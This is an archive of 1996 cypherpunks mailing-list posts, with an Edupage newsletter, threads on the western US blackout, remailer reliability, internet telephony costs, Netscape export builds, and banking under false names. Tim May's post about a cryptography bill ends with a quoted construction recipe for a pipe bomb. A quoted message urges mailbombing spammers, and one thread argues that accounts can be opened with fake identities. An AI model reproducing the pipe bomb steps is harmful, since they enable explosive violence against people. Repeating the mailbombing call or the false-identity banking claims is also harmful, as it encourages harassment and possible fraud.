Message-ID: <01I85ZST2Z8O9JD53S@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From:	IN%"educom@educom.unc.edu" 11-AUG-1996 20:55:02.08
>To:	IN%"edupage@elanor.oit.unc.edu"  "EDUCOM Edupage Mailing List"
>Subj:	Edupage, 11 August 1996

>*****************************************************************
>Edupage, 11 August 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>*****************************************************************

>U.K. INTERNET PROVIDERS PLAN TO RESTRICT CYBERPORN
>Reacting to pressure from Scotland Yard, the Internet Service Providers
>Association, representing 60 of an estimated 140 providers in the United
>Kingdom, will be asking its members to voluntarily block access to sites
>and services featuring hard-core pornography.  An executive of Demon
>Internet, which has the largest subscriber base in the U.K., dismisses the
>proposed action as ineffective:  "This is not a solution, it is just hiding
>the problem."  (Financial Times 10 Aug 96)

	I suspect that the largest subscriber base is about to get larger...

>PRIVACY VS. FREEDOM-OF-INFORMATION ON THE WEB
>A computer consultant in Oregon paid the state $222 for its complete motor
>vehicles data base, which he then posted to a Web site, prompting charges
>of privacy violations from people who complained that he had invaded their
>privacy.  The database allows anyone with an Oregon license plate number to
>look up the vehicle owner's name, address, birthdate, driver's license
>number, and title information.  The consultant's motive in posting the
>information, which anyone can obtain for a fee by going to a state office,
>was to improve public safety by allowing identification of reckless
>drivers.  Oregon Governor John Kitzhaver says that instant access to motor
>vehicle records over the Internet is different from information access
>obtained by physically going to state offices and making a formal request
>for information:  ``I am concerned that this ease of access to people's
>addresses could be abused and present a threat to an individual's safety.''
>(Associated Press 8 Aug 96)

	At least they mentioned that it was publically available... but I don't
see any difference between net.availability and physical.availability.
	-Allen

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Ray Croc (if your name is Ray Croc;  otherwise, substitute your own name).
>....  To cancel, send a message to: listproc@educom.unc.edu with the
>message: unsubscribe edupage.   (If you have subscription problems, send
>mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 12 Aug 1996 19:13:17 +0800
To: "Z.B." <zachb@netcom.com>
Subject: [off-topic] Re: US Power Outages
Message-ID: <v02120d13ae347585efdc@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:24 8/11/96, Z.B. wrote:
>>From what I read, this wasn't a "small localized disturbance".
>Apparently, a fire underneath one of the main towers on the CA-OR border
>was the cause of the problem.  Now that may not sound like too much, but
>the lines were carrying at least 3000Mw of electricity, enough "to power
>3-1/2 Seattles for a day" (quote from local newspaper).  My guess is that
>when there is a problem involving that much power with no place to go,
>the safety systems shut everything down to prevent damage.

It was a disturbance at a single power line. By any standard, this should
not lead to a blackout from Canada to Mexico. Does anybody here have some
first hand knowledge about power transfer at the scale of the US grid?



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 12 Aug 1996 17:02:05 +0800
To: Dave Farber <farber@central.cis.upenn.edu>
Subject: Re: US Power Outages
Message-ID: <199608120525.WAA25154@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:15 PM 8/11/96 -0400, Dave Farber wrote:
>attempt to explain that blackout and how to prevent such. We have not
>progressed very far. The avalanche behavior of power systems is still not
>well understood and techniques to prevent such failures are not obvious.

It surprises me how little these systems appear to be monitored.
It took some hours for them to decide that the brush fire on the
California border didn't cause the system to shut down;
you'd think they'd know quickly that the subsystem shut itself down
or disconnected from the grid or whatever because of reason #17...

One of my concerns about the situation is that it's only a week
or two after Clinton's speech about how The Government needs to protect the
National Information Infrastructure for us.  I'm not paranoid enough
to think that they did it, but I'm sure that within a week we'll
see Al Gore or somebody making an NII Protection Agency speech
and Louis Freeh explaining that we need enhanced wiretap underwriting
to make sure that encryption-wielding hackers don't do it again.

>As someone who was married in NYC during the 65 blackout *happened at 1716
A former boss of mine was on his honeymoon cruise in the Caribbean
and pulled into scenic Havana harbor the day of the Revolution....

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	Defuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Mon, 12 Aug 1996 20:28:23 +0800
To: cypherpunks@toad.com
Subject: Re: US Power Outages
Message-ID: <v02140b00ae3493b29455@[204.179.131.58]>
MIME-Version: 1.0
Content-Type: text/plain


Lucky (crypto-leprechaun) wrote:
> At 18:15 8/11/96, Dave Farber wrote:
> >The avalanche behavior of power systems is still not
> >well understood and techniques to prevent such failures are not obvious.
> >Same can be said of telephone and computer networks at different levels.
>
> Does somebody here have a pointer to literature on this topic? A system in
> which small localized disturbances can amplify, propagate through the
> system, leading to catastrophic failure is the worst of all possible
> designs. I fail to understand why a system as important as the power grid
> would display this type of behavior. Why is the grid negatively dampened?

Because the system designed to fail non-destructively rather than risk
a power surge.  Part of the problem is that the power being controlled
moves as fast as any information about the state of the network: all
decisions must be made locally at the switch level.  When a major line
fails the power generation stations can not just "turn off the juice" at
the speed required, the power must either be redistributed or else the
switch overloads and shuts down to prevent a massive power spike.  The
power companies would rather face the ire of consumers without power for
an evening than the outcry that would happen if every toaster, microwave,
and computer on the west coast was fried by the spike caused by 3 gigawatts
being dumped into grids that could not handle the load (not to mention the
long-term blackouts caused by local switching equipment getting fried.)
In this case the system must fail to prevent damage.

The great east coast blackout was caused by a $50 switch which wore out.
The switch happened to control a chunk of load which was re-routed on to
another line, causing a cascade failure as the excess load caused other
switches to fail when it was dumped on to those lines (and the excess
load caused by these other switches tripping accellerated the failure.)
Power distribution is not like telecom, if a phone switch dies the calls
end; the failure does not endanger the upstream switch with overload
from bits not going anywhere.

Imagine that cars on highways had no brakes until they reached an offramp
but the DOT could apply a kill-switch to segments between offramps (tying
this thread into another non-crypto thread on the list :),if a failure in
the roadway caused traffic to stop then all of the upstream traffic would
have to be dumped off the road via offramps that were only one or two lanes.
This would cause further bottlenecks and the kill-switch would need to be
applied to more and more segments upstream to prevent the traffic stopped
or being slowly bled off from causing more problems.  No imagine that
offramp-to-offramp messages were transmitted via messengers travelling
upstream in the carpool lane :)

Even the power company's secret experiments in the cores of nuclear reactors
have not found a way to get around the 186,000 km/s speed limit on everything.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Aug 1996 16:48:28 +0800
To: cypherpunks@toad.com
Subject: Re: John Gilmore on the Radio!
In-Reply-To: <Pine.GUL.3.95.960809165855.15077A-100000@Networking.Stanford.EDU>
Message-ID: <ge7isD74w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <rich@c2.org> writes:

> On Fri, 9 Aug 1996, P. J. Ponder wrote:
>
> > Gilmore was referred to by Dvorak as the head of the cypherpunks a few
> > times.
>
> Did he mention any other body parts?

Like tentacles?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Aug 1996 16:41:40 +0800
To: cypherpunks@toad.com
Subject: Re: cybergangs?
In-Reply-To: <199608100514.AAA32117@manifold.algebra.com>
Message-ID: <kR7isD77w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:

> Eric Wilson wrote:
> > > How come this hasn't happened yet? Okay maybe not at such a grand scale,
> > > but ya know?
> > A kind of Cybermilitia! Can we still wear green uniforms and camouflage fac
> > paint?
>
> Go to news.* groups. You will see all kinds of people there.

Death to the Usenet Cabal! All power to the GruborBots!

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Mon, 12 Aug 1996 19:12:31 +0800
To: cypherpunks@toad.com
Subject: Netscape US betas lagging...
Message-ID: <Pine.GUL.3.95.960812003508.23548E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The international version is 3.0b7. The export-controlled version on wwwus
is two revisions and almost a month behind at 3.0b5. Have y'all simply not
had time/inclination to recompile the 128-bit version with the latest
patches, or is there some sort of trouble brewing? 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMg7ft5NcNyVVy0jxAQGLNAIAwf9BqKx+kHjfN/4YRfjHhXsqv8S6qbQ2
DiotNQxH/rrauDWOzh5TaTTgUp+0syzWKIvQtXUZC1+9JduWK39d6w==
=W2nf
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Aug 1996 18:54:59 +0800
To: cypherpunks@toad.com
Subject: Re: problem software
In-Reply-To: <199608101547.IAA13645@patty.loop.net>
Message-ID: <k27isD80w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ARCHFIEND <sven@loop.com> writes:
> >we have problem software looming on the horizen here.
> >does anyonw have the expertise to write any
> >anti-lightening.bolt software that can disable
> >or disengage these e-mail address collectors?
>
> We come face to face with our old problems organization and consistency.  If
> we want to "stop" lightning bolt and other programs like this (6 hours of
> coding for anyone halfway to reality), we have to stop its profitability by
> 1) boycotting advertisers and 2) assiduously, consistently, mailbombing the
> fuck out of their addresses until their ISPs drop them.

Hey - we just got back from a trip, it's good to see all your guys back
online.

I think one way to fightt junk e-mail is to do what I proposed: have a
"don't-e-mail" list available for FTP, and make it trivial to add one's
address to it. I can talk more about how I envision this if anyone is
willing to consider putting such a thing up.

I honestly don't think lightening&co want to e-mail people who don't
want to be e-mailed.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 12 Aug 1996 16:45:49 +0800
To: cypherpunks@toad.com
Subject: Re: Chemistry question please ..
In-Reply-To: <199608101736.KAA02222@mail.pacifier.com>
Message-ID: <NB8isD81w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell <jimbell@pacifier.com> writes:
> At 08:53 AM 8/10/96 -0700, anonymous-remailer@shell.portal.com wrote:
> >Is there such a chemical compound as putracine ( maybe not correctly spelled
> ) which emulates the extreme odor of rotting corpses ?
>
> Yes.  The proper spelling is putrescine.  There's also another one called
> "cadaverine."  And yet another called "skatole."   ("scatology")
>
> >If so where can I find out how to make it ?
>
> Not on cypherpunks.  If you want to know more, communicate with me directly.
>  Use a penet-like remailer if you want...

If someone were to start a chempunks mailing list, I'd subscribe.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Mon, 12 Aug 1996 14:01:39 +0800
To: John Young <jya@pipeline.com>
Subject: (Off Topic) Re: FCC_ups
In-Reply-To: <199608112108.VAA23815@pipe1.ny3.usa.pipeline.com>
Message-ID: <Pine.BSF.3.91.960812015431.25054A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



(no crypto here, so delete it already)  :)

Yeah, right.

The tier one ISPs are refusing to peer with anyone that does not have at
least a T3 backbone cross-country, as they don't want to have to carry
other's bits long haul at no charge.. This is to keep "small ISP" from
opening locations all over the country, and connecting to "the Internet"
(bigger providors with cross-country capacity) without paying for the
long-haul capacity. 

Just because this scheme is economical on a small scale (probably only
looking at the costs of the two "ends", and considering the long haul to 
be "free") doesn't mean that it will work on a large scale. Large ISPs 
pay the same costs for infrastructure as telephone companies - or more.

POTS takes 64 Kb/s for one call, or 24 calls per T1. Analog from the CO to
your house, digital in between COs.  Packetizing the voice transmission to
carry it in IP increases the required bandwidth, unless compression is
used. Compression is getting better, but even state-of-the-art systems at
16 Kb/s sound like a bad connection on a car phone, IMHO. Go lower, and
you sound like Mickey Mouse - or Mickey on a car phone. ;)  I'd rather 
pay the dime lady $.10 per minute for a good connection than pay somebody 
else $.05-.08 for compressed audio.

On top of all that, most sound cards in PCs (today) are only capable of 
half-duplex audio. If you don't know why that matters, go play with your 
walkie-talkie a bit.

"The Internet" isn't "free", and as more delay-sensitive applications 
(voice, video) are added, ISPs will only become MORE aware of the demands 
their client's activities place on their capacity. I'd rather not see 
usage tarrifed on a volume basis, but this sort of approach to doing 
business on the 'net only makes such charges more likely.

Twenty years from now, you'll still have a few players dominating the top 
level - the infrastructure needed to support communications is expensive 
to create, maintain, and manage. The economies of scale in this industry 
will drive others out of the top tier. There will still be plenty of 
niche providors that focus on the vertical markets, and lease their 
bandwidth from the big players - same as today. As for whether the 
players will be the same as today, that depends. If the railroads had 
realized that they were in the transportation business, instead of the 
train business, they'd be flying airplanes today.

Anyone that wants to carry a large volume of traffic via the 'net will
find that either the market will dictate that they pay for the bandwidth
they use, or the FCC will. I don't see the FCC getting involved, unless
the "phone service via internet" providor tries to use the courts to get
out of paying for the bandwidth they use. They'll be restricted by the 
size of the "pipe" they purchase from their ISP, and the ISPs all charge 
more for access from larger "pipes." If they lease their own 
cross-country circuits, they'll pay the same (or higher) costs as the Telcos.

The large telephone companies are moving away from circuit switched 
networks, and towards packet switched networks - have been for years. 
It's called ATM, and it's not in wide use yet. There are advantages to 
building large scale communication systems this way, but "free bandwidth" 
is not one of them.

- Ranting Wombat

On Sun, 11 Aug 1996, John Young wrote:

>    8-10-96. WaPo: 
>  
>    "Phone Service Via the Internet May Slash Rates." 
>  
>       Labs of Advanced Technology has developed a way for 
>       people to make long-distance calls over the Internet 
>       using only their telephones, at about half the price of 

SNIP
>       phone companies. "Twenty years from now, and probably 
>       sooner, I don't see the giants of the telecommunications 
>       industry existing anymore," said the company's 
>       president. The giants hoot, "FCC, PACs, whack him." 
SNIP




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Aug 1996 09:05:01 +0800
To: cypherpunks@toad.com
Subject: A ban on cryptography?
Message-ID: <ae34bfd606021004239d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain




Anyone know anything about the status of this bill?

--begin bill excerpt--

                                           S.1666

Department of Commerce Authorization Act for Fiscal Year 1997 (Passed by the
Senate)

SEC. 1042. PROHIBITION ON THE DISTRIBUTION OF INFORMATION
RELATING TO USE OF CRYPTOGRAPHY FOR A CRIMINAL PURPOSE.

       (a) UNLAWFUL CONDUCT- Section 875 of title 18, United States Code,
is amended by adding at the end the
       following new subsection:

       `(l) It shall be unlawful for any person to teach or demonstrate the
use of cryptographic systems, or to distribute by any means information
pertaining to, in whole or in part, the construction of digital ciphers,
if the person intends or knows, that such cryptographic materials or
information will be used for, or in furtherance of, an activity that
constitutes a Federal criminal offense or a criminal purpose affecting
interstate commerce.'.


--end bill excerpt--

--Tim May

(P.S. it may not be real, but it _could_ be real.)

HOW TO MAKE A PIPE BOMB:
"Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
ends.  Buy two metal caps to fit.  These are standard items in hardware
stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
on one end. Fill the pipe to within 1/2 inch of the top with black powder.
Do not pack the powder. Don't even tap the bottom of the pipe to make it
settle.  You want the powder loose.  For maximum explosive effect, you need
dry, fine powder sitting loose in a very rigid container." (more
information at http://sdcc13.ucsd.edu/~m1lopez/pipe.html, or by using
search engines)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Mon, 12 Aug 1996 20:25:22 +0800
To: proff@suburbia.net
Subject: Re: Read; NOW
Message-ID: <199608120931.FAA18644@booz.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: proff@suburbia.net, cypherpunks@toad.com
Date: Mon Aug 12 05:34:05 1996
Perhaps this UNIX_CODE wants to create a mailing list with out names on 
it.. if we reply to him......
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMg76juJ+JZd/Y4yVAQFT0AQMDvQgn8c1bNhpZ16Niqbdho71jCeyTV0I
z5o5NPnSspEUhhxI3CIMp0OVwThaAOpRPakL8Pm6pjc08tgr0Hjbg0d0zFvVVDcM
Wkh6mSCYXFIEz043ZDiSuYQuY8Zs8ChiBTTElJQM5Ns2j6O1jYyiogGwSgVTszvV
TCj9PWFovL5VHQ==
=DVBI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 12 Aug 1996 22:06:46 +0800
To: Vincent Cate <cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
Message-ID: <2.2.32.19960812101556.00a54ec4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:37 PM 8/11/96 -0400, Vincent Cate wrote:

>If the laws of a country say it is fraud to open a bank account with 
>a fake passport, then encouraging someone to do so is encouraging
>fraud.  Check with your lawyer and see if you can open up a bank
>account with a fake passport.  

My lawyer says that at common law you can use any name to open an account as
long as there is no intent to defraud.  Since I am giving the bank money and
not vice-versa, it can't be common law fraud.  I'm lending to them.  They
aren't lending to me.  It *is* illegal in the US for the bank to open an
account for me without some ID checks, but it is not *my* problem and it is
not fraud.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 13 Aug 1996 02:27:27 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199608121350.GAA14978@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"nemesis"} = "<remailer@meaning.com> cpunk pgp hash latent cut";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
$remailer{"lucifer"} = "<lucifer@dhp.com> cpunk mix pgp hash latent cut ek";
$remailer{"jam"} = "<remailer@cypherpunks.ca> cpunk mix pgp hash latent cut ek";
$remailer{"winsock"} = "<winsock@c2.org> cpunk pgp hash cut ksub reord";
$remailer{'nym'} = '<config@nym.alias.net> newnym pgp';
$remailer{"balls"} = "<remailer@huge.cajones.com> cpunk pgp hash latent cut ek";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 12 Aug 96 6:48:36 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     -++--++-+--+  2:22:53  99.96%
haystack haystack@holy.cow.net            *+*#*+*--###    21:59  99.95%
balls    remailer@huge.cajones.com                *++#     6:01  99.95%
lead     mix@zifi.genetics.utah.edu       ++++++++--++  1:59:31  99.94%
replay   remailer@replay.com              *** **+***+*     5:07  99.91%
nymrod   nymrod@nym.jpunix.com            #+** *####-#    23:23  99.90%
penet    anon@anon.penet.fi               ------_.--   14:43:28  99.55%
jam      remailer@cypherpunks.ca          **** _.-****  6:31:35  98.67%
nemesis  remailer@meaning.com             **+  *  ****    28:31  98.61%
winsock  winsock@c2.org                   ----..--_ -  18:19:17  97.80%
amnesia  amnesia@chardos.connix.com       --- ------    3:20:56  96.89%
extropia remail@miron.vip.best.com        __  ------   10:03:23  91.52%
ncognito ncognito@rigel.cyberpass.net     -....----+    7:57:35  89.83%
alpha    alias@alpha.c2.org               +-+*+-_.      5:24:22  58.18%
c2       remail@c2.org                    --+---..      5:59:32  57.68%
lucifer  lucifer@dhp.com                  +--+++++        53:57  56.99%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 13 Aug 1996 01:27:28 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
In-Reply-To: <2.2.32.19960812101556.00a54ec4@panix.com>
Message-ID: <Pine.LNX.3.91.960812071219.5395A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 12 Aug 1996, Duncan Frissell wrote:
> At 01:37 PM 8/11/96 -0400, Vincent Cate wrote:
> 
> >If the laws of a country say it is fraud to open a bank account with 
> >a fake passport, then encouraging someone to do so is encouraging
> >fraud.  Check with your lawyer and see if you can open up a bank
> >account with a fake passport.  
> 
> My lawyer says that at common law you can use any name to open an account as
> long as there is no intent to defraud.  Since I am giving the bank money and
> not vice-versa, it can't be common law fraud.  I'm lending to them. 

Interesting. 

First, common law only applies if there is no specific law against it. In
some countries there are specific laws.  Is your lawyer sure there is no
specific law against this in the USA? 

> They
> aren't lending to me.  It *is* illegal in the US for the bank to open an
> account for me without some ID checks, but it is not *my* problem and it is
> not fraud.

Second, maybe they are lending to you.  Or maybe you are laundering money.

This also depends on the bank forms.  If they ask you to list any other
aliases you use, or your social security number, etc, you probably need to
lie to fill out the form. 

Think your lawyer would be willing to give his name and a statement on
this?  If a cypherpunk ever got in trouble and could say, "I was told by
the lawyer XYZZY this was legal", it might help.  :-)

  --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 12 Aug 1996 23:17:34 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: US Power Outages
In-Reply-To: <v02140b00ae3493b29455@[204.179.131.58]>
Message-ID: <199608121228.HAA11850@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Jim McCoy wrote:
> Even the power company's secret experiments in the cores of nuclear reactors
> have not found a way to get around the 186,000 km/s speed limit on everything.
> 

I wonder where does the 186,000 km/s speed limit come from? ;)

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Tue, 13 Aug 1996 03:52:19 +0800
To: cypherpunks@toad.com
Subject: Re: FCC_ups
Message-ID: <2.2.32.19960812155336.012936dc@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:58 PM 8/11/96 -0700, you wrote:
>At 14:08 8/11/96, John Young wrote:
>>   8-10-96. WaPo:
>>
>>   "Phone Service Via the Internet May Slash Rates."
>>
>>      Labs of Advanced Technology has developed a way for
>>      people to make long-distance calls over the Internet
>>      using only their telephones, at about half the price of
>>      ordinary toll calls. Customers would merely call a
>>      central number, then dial their long-distance numbers.
>>      The call is carried on the Internet, then put back onto
>>      the local phone system at its destination. The company
>>      plans to charge 5 to 8 cents per minute for all domestic
>>      U.S. calls, which represents a 50 to 75 percent discount
>>      off most domestic long-distance rates.
>
>I am glad to see some movement in this area. I designed a similar system
>for a previous employer of mine. But the real choke point is the local
>loop. As of this day, the local telos still have a de facto monopoly in the
>local markets. The new competitors (the same old Phone Company) that we
>will see in the near future seem to show no desire to deliver the really


The real issue concerns the $0.03 per minute access fee that LD companies
pay the local loop for voice communications. Seems there is difference
between data bits and voice bits. VON has sparked this debate and the ISP's
may end up paying the RBOCs the access fee.

The way around that as well is through point to point wiring (and of course
wireless systems). PairGain Technology is manufacturing a product that
provides 384Kbps data and voice over a single pair of copper. Many RBOCs
will sell you a LAD circuit which is point-to-point, unloaded, and
unswitched. They go by different names : telegraph circuits, alarm circuits,
Local Area Data Circuit. Ask a security company what kind of circuit they
install. Your mileage may vary.

--j





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 13 Aug 1996 04:43:12 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re: US Power Outages
Message-ID: <199608121610.JAA05896@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:28 AM 8/12/96 -0500, Igor Chudov @ home wrote:
>Jim McCoy wrote:
>> Even the power company's secret experiments in the cores of nuclear reactors
>> have not found a way to get around the 186,000 km/s speed limit on everything.
>> 
>
>I wonder where does the 186,000 km/s speed limit come from? ;)
>

A serious confusion as to proper units.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Tue, 13 Aug 1996 00:38:44 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Unmetered Net Usage
In-Reply-To: <ae33ffaf03021004fdeb@[205.199.118.202]>
Message-ID: <199608121309.JAA25649@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text



> Will "unmetered" usage go away? It depends on a lot of factors. Right now,
> unmetered usage is a big enough marketing draw that it appears to
> outcompete metered usage plans. Sure, there are people like me who pay a
> flat rate (in my case, $20/month) and yet who are on for several hours a

My view point on this is that there will always be unmetered use but
it will ALWAYS have a lower priority. That if you want to ensure that
the download your doing or the internet phone call you placing gets
through you'll have to pay it bit...

You pay for faster routing
You will pay for priority access
You will pay for transaction control and measure and monitoring..
etc..

If you don't care about those things.. and will surf on the left over
bits' i'm sure it will always be unmetered.

/hawk





